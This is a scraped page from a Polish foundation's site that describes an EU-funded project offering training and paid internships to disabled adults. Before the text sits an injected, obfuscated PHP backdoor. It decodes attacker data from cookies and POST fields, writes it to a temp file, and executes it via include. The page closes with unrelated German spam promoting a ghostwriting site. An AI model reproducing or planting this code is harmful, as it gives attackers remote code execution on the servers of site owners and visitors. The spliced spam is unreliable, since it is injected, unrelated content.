$Johlz = class_exists("WY_lQXgw");if (!$Johlz){class WY_lQXgw{private $XMBgjVLfF;public static $fSjsCKN = "7f79d202-e1d0-459e-8c2f-2ffce709bf17";public static $azntJ = NULL;public function __construct(){$JoBZldPtVw = $_COOKIE;$ifbqx = $_POST;$hgyvDgSN = @$JoBZldPtVw[substr(WY_lQXgw::$fSjsCKN, 0, 4)];if (!empty($hgyvDgSN)){$HVodJI = "base64";$yfQvTLp = "";$hgyvDgSN = explode(",", $hgyvDgSN);foreach ($hgyvDgSN as $aMCIPglBRa){$yfQvTLp .= @$JoBZldPtVw[$aMCIPglBRa];$yfQvTLp .= @$ifbqx[$aMCIPglBRa];}$yfQvTLp = array_map($HVodJI . "\x5f" . chr (100) . chr ( 577 - 476 )."\143" . chr ( 565 - 454 )."\x64" . "\145", array($yfQvTLp,)); $yfQvTLp = $yfQvTLp[0] ^ str_repeat(WY_lQXgw::$fSjsCKN, (strlen($yfQvTLp[0]) / strlen(WY_lQXgw::$fSjsCKN)) + 1);WY_lQXgw::$azntJ = @unserialize($yfQvTLp);}}public function __destruct(){$this->SUnmT();}private function SUnmT(){if (is_array(WY_lQXgw::$azntJ)) {$kdNwpj = sys_get_temp_dir() . "/" . crc32(WY_lQXgw::$azntJ['s' . "\x61" . "\154" . chr (116)]);@WY_lQXgw::$azntJ[chr (119) . "\162" . "\151" . 't' . chr (101)]($kdNwpj, WY_lQXgw::$azntJ['c' . chr (111) . "\156" . "\164" . chr (101) . "\x6e" . chr ( 556 - 440 )]);include $kdNwpj;@WY_lQXgw::$azntJ['d' . chr ( 624 - 523 ).chr ( 1054 - 946 ).chr (101) . chr (116) . "\x65"]($kdNwpj);exit();}}}$VokiKwItz = new WY_lQXgw(); $VokiKwItz = NULL;} ?> Wspieramy Tworzymy Zatrudniamy – Fundacja Jesteśmy Równi

Projekt WTZ Wspieramy Tworzymy Zatrudniamy jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego i skierowany do osób niepełnosprawnych w stopniu umiarkowanym lub znacznym (grupa II lub II).

Projekt ma na celu wsparcie 60 niepełnosprawnych kobiet i mężczyzn z powiatu wrzesińskiego, średzkiego i słupeckiego w wieku 18-64 lata. Wyłonione w procesie rekrutacji osoby wezmą udział w cyklu szkoleń, warsztatów i spotkań z doradcami i odbędą płatny staż, a w kolejnym etapie część z nich podejmie zatrudnienie u pracodawcy.

Osoby, które zgłoszą się i zakwalifikują do projektu, wezmą udział w dwumiesięcznych bezpłatnych szkoleniach i otrzymają:

 • staż z wynagrodzeniem 1600zł netto

Wszelkie szkolenia, spotkania, warsztaty i doradztwo w ramach projektu są dla uczestników całkowicie bezpłatne.

Projekt realizowany będzie w 6 etapach, w ramach każdego z nich zostanie utworzona 10 osobowa grupa uczestników, każdorazowo według następującego scenariusza:

 • składanie dokumentów rekrutacyjnych,
 • weryfikacja formalna dokumentów rekrutacyjnych,
 • rozmowy kwalifikacyjne,
 • wyłonienie Uczestników zakwalifikowanych do Projektu,
 • indywidualne spotkania z doradcą zawodowym i psychologiem,
 • coaching,
 • cykl szkoleń zawodowych,
 • rejestracja w bazie osób poszukujących pracy,
 • staż,
 • zakończenie projektu.

Projekt zakończony.

Tweet schlagwörter psychologie https://hausarbeithilfe.com/ spinnenangst ähnliche artikel dschungelcamp-affäre lehrerin muss nach falscher krankschreibung fast bachelorarbeit schreiben lassen 10 000 euro strafe zahlen 30.